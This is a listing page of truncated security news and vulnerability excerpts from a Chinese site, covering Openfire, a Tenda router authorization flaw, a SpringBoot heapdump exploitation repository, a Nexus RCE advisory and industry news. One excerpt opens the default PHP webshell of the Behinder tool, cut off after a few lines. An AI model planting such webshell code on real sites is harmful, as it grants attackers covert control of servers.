微慑信息网-VulSee.com

  0x01 简介 Openfire（以前称为Wildfire和Jive Messenger）是IgniteRealtime支持的Jabber服务器。它是一个跨平台的Java应用程序，将其自身定位为中型企业控制内部通信并简化即时消...

赞(0)微慑管理员2020-08-10Application 阅读(9662)

 漏洞简介:  腾达(Tenda) AC 系列是由腾达发布的针对家庭用户的无线路由器，市场占用率比较高，为综合类别较全的家庭无线路由器。 腾达(Tenda) AC 提供Web服务组件中的goform插件存在一个设计缺陷，权限验证不严格，可在...

赞(0)微慑管理员2020-08-10Hardware 阅读(4124)

《记录下》 针对建议： （1）使用多种字符组合的强密码，如大小写字母+数字+特殊字符； （2）用户密码中不要出现与用户名或者系统名相关的字符，如用户名@123、系统名123等； （3）不要使用系统默认初始密码；或设定在系统首次登录时，强制修...

赞(0)微慑管理员2020-08-10学习路上 阅读(4795)

果然是满嘴道德仁义，一肚子见不得人的“猫腻”。 近日，美国频频借国家安全、信息泄露之名，行打压中国科技企业之实。谁想这贼喊捉贼的旧把戏，却因为一家背景非常特殊的美国小公司，彻底暴露了。 当地时间8月7日，《华尔街日报》报道称，一家与美国国防...

赞(0)微慑管理员2020-08-09业界快讯 阅读(2096)

2020年8月7日消息，据外媒报道，一名黑客周四公布了从英特尔窃取的20GB绝密芯片工程数据，这些数据可能会给多个平台的用户带来新的“零日漏洞”攻击威胁。 黑客链接到加密信息平台Telegram上的一篇帖子详细说明了窃取的内容，并在底部附上...

赞(0)微慑管理员2020-08-08业界快讯 阅读(2885)

https://github.com/LandGrey/SpringBootVulExploit 利用条件： 可正常 GET 请求目标 /heapdump 或 /actuator/heapdump 接口 利用方法： 步骤一： 找到想要获取的...

赞(0)微慑管理员2020-08-07学习路上 阅读(12774)

冰蝎默认php木马： <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])) { $key=substr(md5(uniqid(rand())),16...

赞(0)微慑管理员2020-08-05学习路上 阅读(7874)

“由于上次遭受攻击的IP地址90%以上属于中国，因此建议防护方对此次攻击足够重视。”——微步情报局 编号: TB-2020-0014 报告置信度：85 TAG: 挖矿 Docker 德国 Linux 后门 TeamTNT TLP: 白（报告...

赞(0)微慑管理员2020-08-04业界快讯 阅读(4192)

技术成熟度曲线简介 Gartner于近日发布了2020年的中国信息与通信技术（ICT）的成熟度曲线（Hype Cycle[1]） [2]，今天，绿盟君将从安全方面的视角观察相关技术的发展。 众所周知，2020年是不平凡的一年，特别是新冠疫情...

赞(0)微慑管理员2020-08-04业界快讯 阅读(2707)

        长亭漏洞风险提示             Nexus Repository Manager 3 远程代码执行漏洞 （CVE-2020-15871） 7 月 29 日，Sonatype 官方发布安全公告，声明修复了存在于 Ne...

赞(0)微慑管理员2020-08-04Application 阅读(2897)